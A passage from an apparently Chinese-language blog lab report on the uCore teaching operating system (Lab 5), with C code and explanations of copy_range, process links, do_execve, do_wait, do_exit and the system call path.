class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* copy_range - copy content of memory (start, end) of one process A to another process B</span></span><br><span class="line"><span class="comment"> * @to:    the addr of process B&#x27;s Page Directory</span></span><br><span class="line"><span class="comment"> * @from:  the addr of process A&#x27;s Page Directory</span></span><br><span class="line"><span class="comment"> * @share: flags to indicate to dup OR share. We just use dup method, so it didn&#x27;t be used.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * CALL GRAPH: copy_mm--&gt;dup_mmap--&gt;copy_range</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">copy_range</span><span class="params">(<span class="type">pde_t</span> *to, <span class="type">pde_t</span> *from, <span class="type">uintptr_t</span> start, <span class="type">uintptr_t</span> end, <span class="type">bool</span> share)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(start % PGSIZE == <span class="number">0</span> &amp;&amp; end % PGSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">USER_ACCESS</span>(start, end));</span><br><span class="line">    <span class="comment">// copy content by page unit.</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">//call get_pte to find process A&#x27;s pte according to the addr start</span></span><br><span class="line">        <span class="type">pte_t</span> *ptep = <span class="built_in">get_pte</span>(from, start, <span class="number">0</span>), *nptep;</span><br><span class="line">        <span class="keyword">if</span> (ptep == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            start = <span class="built_in">ROUNDDOWN</span>(start + PTSIZE, PTSIZE);</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//call get_pte to find process B&#x27;s pte according to the addr start. If pte is NULL, just alloc a PT</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((nptep = <span class="built_in">get_pte</span>(to, start, <span class="number">1</span>)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">            &#125;</span><br><span class="line">        <span class="type">uint32_t</span> perm = (*ptep &amp; PTE_USER);</span><br><span class="line">        <span class="comment">//get page from ptep</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">        <span class="comment">// alloc a page for process B</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *npage=<span class="built_in">alloc_page</span>();</span><br><span class="line">        <span class="built_in">assert</span>(page!=<span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">assert</span>(npage!=<span class="literal">NULL</span>);</span><br><span class="line">        <span class="type">int</span> ret=<span class="number">0</span>;</span><br><span class="line">        <span class="comment">/* LAB5:EXERCISE2 YOUR CODE</span></span><br><span class="line"><span class="comment">         * replicate content of page to npage, build the map of phy addr of nage with the linear addr start</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="comment">// 获取源页面所在的虚拟地址（注意，此时的PDT是内核状态下的页目录表）</span></span><br><span class="line">        <span class="type">void</span> * kva_src = <span class="built_in">page2kva</span>(page);</span><br><span class="line">        <span class="comment">// 获取目标页面所在的虚拟地址</span></span><br><span class="line">        <span class="type">void</span> * kva_dst = <span class="built_in">page2kva</span>(npage);</span><br><span class="line">        <span class="comment">// 页面数据复制</span></span><br><span class="line">        <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">        <span class="comment">// 将该页面设置至对应的PTE中</span></span><br><span class="line">        ret = <span class="built_in">page_insert</span>(to, npage, start, perm);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">assert</span>(ret == <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        start += PGSIZE;</span><br><span class="line">    &#125; <span class="keyword">while</span> (start != <span class="number">0</span> &amp;&amp; start &lt; end);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>简要说明如何设计实现”Copy on Write 机制“，给出概要设计，鼓励给出详细设计。</p><blockquote><p>请移步<strong>扩展练习</strong> 。</p></blockquote></li></ul><h3 id="3-练习3">3) 练习3</h3><blockquote><p><strong>阅读分析源代码，理解进程执行 fork/exec/wait/exit 的实现，以及系统调用的实现</strong></p></blockquote><h4 id="1-do-fork">1. do_fork</h4><ul><li><p>lab5中的<code>do_fork</code>函数与lab4中的实现类似，所不同的是lab5中使用<code>set_links(proc)</code>函数来设置进程间的关系，而不是简单的<code>list_add</code>与<code>nr_process++</code>。</p></li><li><p><code>set_links</code>函数会为当前进程间设置合适的关系，其实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*************************************************************</span></span><br><span class="line"><span class="comment">process relations</span></span><br><span class="line"><span class="comment">parent:           proc-&gt;parent  (proc is children)</span></span><br><span class="line"><span class="comment">children:         proc-&gt;cptr    (proc is parent)</span></span><br><span class="line"><span class="comment">older sibling:    proc-&gt;optr    (proc is younger sibling)</span></span><br><span class="line"><span class="comment">younger sibling:  proc-&gt;yptr    (proc is older sibling)</span></span><br><span class="line"><span class="comment">*************************************************************/</span></span><br><span class="line"><span class="comment">// set_links - set the relation links of process</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">set_links</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">    proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> ((proc-&gt;optr = proc-&gt;parent-&gt;cptr) != <span class="literal">NULL</span>)</span><br><span class="line">        proc-&gt;optr-&gt;yptr = proc;</span><br><span class="line">    proc-&gt;parent-&gt;cptr = proc;</span><br><span class="line">    nr_process ++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>除了lab4熟知的<code>list_add</code>与<code>nr_process++</code>，该函数还设置了<code>proc_struct</code>中的<code>optr、yptr</code>以及<code>cptr</code>成员。</p></li><li><p>其中，<code>cptr</code>指针指向当前进程的子进程中，<strong>最晚创建</strong>的那个子进程，即<code>children</code>；<code>yptr</code>指向<strong>与当前进程共享同一个父进程，但比当前进程的创建时间更晚的进程</strong>，即<code>younger sibling</code>。而<code>optr</code>指针的功能则与<code>yptr</code>相反，指向<code>older sibling</code>。</p></li><li><p>进程间关系如下图所示</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">                     +----------------+</span><br><span class="line">                     | parent process |</span><br><span class="line">                     +----------------+</span><br><span class="line">              parent ^         \       ^  parent</span><br><span class="line">                    /           \       \</span><br><span class="line">                   /             \ cptr  \</span><br><span class="line">                  /         yptr  V       \      yptr</span><br><span class="line">           +-------------+  --&gt;  +-------------+  --&gt;  NULL</span><br><span class="line">           | old process |       | New Process |</span><br><span class="line">NULL  &lt;--  +-------------+  &lt;--  +-------------+</span><br><span class="line">      optr                  optr</span><br></pre></td></tr></table></figure></li></ul></li></ul><h4 id="2-do-execve">2. do_execve</h4><ul><li><p><code>do_execve</code>函数做的事请比较简单</p><ul><li>检查当前进程所分配的内存区域是否存在异常。</li><li>回收当前进程的所有资源，包括已分配的内存空间/页目录表等等。</li><li>读取可执行文件，并根据<code>ELFheader</code>分配特定位置的虚拟内存，并加载代码与数据至特定的内存地址，最后分配堆栈并设置<code>trapframe</code>属性。</li><li>设置新进程名称。</li></ul></li><li><p>该函数<strong>几乎释放原进程所有的资源，除了PCB</strong>。也就是说，<code>do_execve</code>保留了原进程的PID、原进程的属性、原进程与其他进程之间的关系等等。</p></li><li><p>该函数的具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_execve</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">char</span> *binary, <span class="type">size_t</span> size)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm = current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">user_mem_check</span>(mm, (<span class="type">uintptr_t</span>)name, len, <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="keyword">if</span> (len &gt; PROC_NAME_LEN)</span><br><span class="line">        len = PROC_NAME_LEN;</span><br><span class="line">    <span class="type">char</span> local_name[PROC_NAME_LEN + <span class="number">1</span>];</span><br><span class="line">    <span class="built_in">memset</span>(local_name, <span class="number">0</span>, <span class="built_in">sizeof</span>(local_name));</span><br><span class="line">    <span class="built_in">memcpy</span>(local_name, name, len);</span><br><span class="line">    <span class="comment">// 释放内存</span></span><br><span class="line">    <span class="keyword">if</span> (mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">lcr3</span>(boot_cr3);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">mm_count_dec</span>(mm) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">            <span class="comment">// 删除该内存管理所对应的PDT</span></span><br><span class="line">            <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">            <span class="built_in">mm_destroy</span>(mm);</span><br><span class="line">        &#125;</span><br><span class="line">        current-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 加载可执行文件代码，重设mm_struct，以及重置trapframe</span></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">load_icode</span>(binary, size)) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> execve_exit;</span><br><span class="line">    <span class="comment">// 设置进程名称</span></span><br><span class="line">    <span class="built_in">set_proc_name</span>(current, local_name);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">execve_exit:</span><br><span class="line">    <span class="built_in">do_exit</span>(ret);</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;already exit: %e.\n&quot;</span>, ret);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="3-do-wait">3. do_wait</h4><ul><li><p><code>do_wait</code>程序会使某个进程一直等待，直到（特定）子进程退出后，该进程才会回收该子进程的资源并函数返回。该函数的具体操作如下：</p><ul><li>检查当前进程所分配的内存区域是否存在异常。</li><li>查找特定/所有子进程中是否存在某个等待父进程回收的子进程（<code>PROC_ZOMBIE</code>）。<ul><li>如果有，则回收该进程并函数返回。</li><li>如果没有，则设置当前进程状态为<code>PROC_SLEEPING</code>并执行<code>schedule</code>调度其他进程运行。当该进程的某个子进程结束运行后，当前进程会被唤醒，并在<code>do_wait</code>函数中回收子进程的<strong>PCB内存</strong>资源。</li></ul></li></ul></li><li><p>该函数的具体实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_wait</span><span class="params">(<span class="type">int</span> pid, <span class="type">int</span> *code_store)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm = current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (code_store != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">user_mem_check</span>(mm, (<span class="type">uintptr_t</span>)code_store, <span class="built_in">sizeof</span>(<span class="type">int</span>), <span class="number">1</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="type">bool</span> intr_flag, haskid;</span><br><span class="line">repeat:</span><br><span class="line">    haskid = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (pid != <span class="number">0</span>) &#123;</span><br><span class="line">        proc = <span class="built_in">find_proc</span>(pid);</span><br><span class="line">        <span class="keyword">if</span> (proc != <span class="literal">NULL</span> &amp;&amp; proc-&gt;parent == current) &#123;</span><br><span class="line">            haskid = <span class="number">1</span>;</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE)</span><br><span class="line">                <span class="keyword">goto</span> found;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        proc = current-&gt;cptr;</span><br><span class="line">        <span class="keyword">for</span> (; proc != <span class="literal">NULL</span>; proc = proc-&gt;optr) &#123;</span><br><span class="line">            haskid = <span class="number">1</span>;</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE)</span><br><span class="line">                <span class="keyword">goto</span> found;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (haskid) &#123;</span><br><span class="line">        current-&gt;state = PROC_SLEEPING;</span><br><span class="line">        current-&gt;wait_state = WT_CHILD;</span><br><span class="line">        <span class="built_in">schedule</span>();</span><br><span class="line">        <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">            <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">        <span class="keyword">goto</span> repeat;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> -E_BAD_PROC;</span><br><span class="line"></span><br><span class="line">found:</span><br><span class="line">    <span class="keyword">if</span> (proc == idleproc || proc == initproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;wait idleproc or initproc.\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (code_store != <span class="literal">NULL</span>)</span><br><span class="line">        *code_store = proc-&gt;exit_code;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">unhash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">remove_links</span>(proc);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="4-do-exit">4. do_exit</h4><ul><li><p>该函数与<code>do_execve/do_wait</code>函数中的进程回收代码类似，但又有所不同。其具体操作如下：</p><ul><li><p>·回收所有内存（除了PCB，该结构只能由父进程回收）</p></li><li><p>设置当前的进程状态为<code>PROC_ZOMBIE</code></p></li><li><p>设置当前进程的退出值<code>current-&gt;exit_code</code>。</p></li><li><p>如果有父进程，则唤醒父进程，使其准备回收该进程的PCB。</p><blockquote><p>正常情况下，除了<code>initproc</code>和<code>idleproc</code>以外，其他进程一定存在父进程。</p></blockquote></li><li><p>如果当前进程存在子进程，则设置所有子进程的父进程为<code>initproc</code>。这样倘若这些子进程进入结束状态，则<code>initproc</code>可以代为回收资源。</p></li><li><p>执行进程调度。一旦调度到当前进程的父进程，则可以马上回收该终止进程的<code>PCB</code>。</p></li></ul></li><li><p>该函数的具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_exit</span><span class="params">(<span class="type">int</span> error_code)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (current == idleproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;idleproc exit.\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (current == initproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;initproc exit.\n&quot;</span>);</span><br><span class="line">    <span class="comment">// 释放所有内存空间</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm = current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">lcr3</span>(boot_cr3);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">mm_count_dec</span>(mm) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">            <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">            <span class="built_in">mm_destroy</span>(mm);</span><br><span class="line">        &#125;</span><br><span class="line">        current-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 设置当前进程状态</span></span><br><span class="line">    current-&gt;state = PROC_ZOMBIE;</span><br><span class="line">    current-&gt;exit_code = error_code;</span><br><span class="line">    <span class="comment">// 请求父进程回收剩余资源</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc = current-&gt;parent;</span><br><span class="line">        <span class="comment">// 唤醒父进程。父进程准备回收该进程的PCB资源。</span></span><br><span class="line">        <span class="keyword">if</span> (proc-&gt;wait_state == WT_CHILD)</span><br><span class="line">            <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">        <span class="comment">// 如果当前进程存在子进程，则设置所有子进程的父进程为init。</span></span><br><span class="line">        <span class="keyword">while</span> (current-&gt;cptr != <span class="literal">NULL</span>) &#123;</span><br><span class="line">            proc = current-&gt;cptr;</span><br><span class="line">            current-&gt;cptr = proc-&gt;optr;</span><br><span class="line"></span><br><span class="line">            proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">            <span class="keyword">if</span> ((proc-&gt;optr = initproc-&gt;cptr) != <span class="literal">NULL</span>)</span><br><span class="line">                initproc-&gt;cptr-&gt;yptr = proc;</span><br><span class="line">            proc-&gt;parent = initproc;</span><br><span class="line">            initproc-&gt;cptr = proc;</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE) &#123;</span><br><span class="line">                <span class="keyword">if</span> (initproc-&gt;wait_state == WT_CHILD)</span><br><span class="line">                    <span class="built_in">wakeup_proc</span>(initproc);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 该进程的生命周期即将结束，调度其他进程执行。</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;do_exit will not return!! %d.\n&quot;</span>, current-&gt;pid);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="5-syscall系统调用">5. syscall系统调用</h4><ul><li><p><code>syscall</code>是内核程序为用户程序提供内核服务的一种方式。</p></li><li><p>在用户程序中，若需用到内核服务，则需要执行<code>sys_xxxx</code>函数，例如<code>sys_kill</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sys_kill</span><span class="params">(<span class="type">int</span> pid)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">syscall</span>(SYS_kill, pid);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>实际上，<code>sys_xxxx</code>函数全都是用户态<code>syscall</code>函数的wrapper。那些函数会设置参数并执行<code>syscall</code>函数，而该函数的实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">int</span> <span class="title">syscall</span><span class="params">(<span class="type">int</span> num, ...)</span> </span>&#123;</span><br><span class="line">    va_list ap;</span><br><span class="line">    <span class="built_in">va_start</span>(ap, num);</span><br><span class="line">    <span class="type">uint32_t</span> a[MAX_ARGS];</span><br><span class="line">    <span class="type">int</span> i, ret;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; MAX_ARGS; i ++)</span><br><span class="line">        a[i] = <span class="built_in">va_arg</span>(ap, <span class="type">uint32_t</span>);</span><br><span class="line">    <span class="built_in">va_end</span>(ap);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="string">&quot;int %1;&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;=a&quot;</span> (ret)</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span> (T_SYSCALL),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;a&quot;</span> (num),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;d&quot;</span> (a[<span class="number">0</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;c&quot;</span> (a[<span class="number">1</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;b&quot;</span> (a[<span class="number">2</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;D&quot;</span> (a[<span class="number">3</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;S&quot;</span> (a[<span class="number">4</span>])</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;cc&quot;</span>, <span class="string">&quot;memory&quot;</span>)</span></span>;</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数会设置<code>%eax, %edx, %ecx, %ebx, %edi, %esi</code>五个寄存器的值分别为<strong>syscall调用号、参数1、参数2、参数3、参数4、参数5</strong>，然后执行int中断进入中断处理例程。</p></li><li><p>在中断处理例程中，程序会根据中断号，执行<code>syscall</code>函数（注意该syscall函数为内核代码，非用户库中的syscall函数）。内核syscall函数会一一取出六个寄存器的值，并根据系统调用号来执行不同的系统调用。而那些系统调用的实质就是其他内核函数的wrapper。以下为<code>syscall</code>函数实现的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">syscall</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = current-&gt;tf;</span><br><span class="line">    <span class="type">uint32_t</span> arg[<span class="number">5</span>];</span><br><span class="line">    <span class="type">int</span> num = tf-&gt;tf_regs.reg_eax;</span><br><span class="line">    <span class="keyword">if</span> (num &gt;= <span class="number">0</span> &amp;&amp; num &lt; NUM_SYSCALLS) &#123;</span><br><span class="line">        <span class="keyword">if</span> (syscalls[num] != <span class="literal">NULL</span>) &#123;</span><br><span class="line">            arg[<span class="number">0</span>] = tf-&gt;tf_regs.reg_edx;</span><br><span class="line">            arg[<span class="number">1</span>] = tf-&gt;tf_regs.reg_ecx;</span><br><span class="line">            arg[<span class="number">2</span>] = tf-&gt;tf_regs.reg_ebx;</span><br><span class="line">            arg[<span class="number">3</span>] = tf-&gt;tf_regs.reg_edi;</span><br><span class="line">            arg[<span class="number">4</span>] = tf-&gt;tf_regs.reg_esi;</span><br><span class="line">            tf-&gt;tf_regs.reg_eax = syscalls[num](arg);</span><br><span class="line">            <span class="keyword">return</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">print_trapframe</span>(tf);</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;undefined syscall %d, pid = %d, name = %s.\n&quot;</span>,</span><br><span class="line">            num, current-&gt;pid, current-&gt;name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>等相应的内核函数结束后，程序通过之前保留的<code>trapframe</code>返回用户态。一次系统调用结束。</p></li></ul><h4 id="Questions">*. Questions</h4><p>简要说明你对 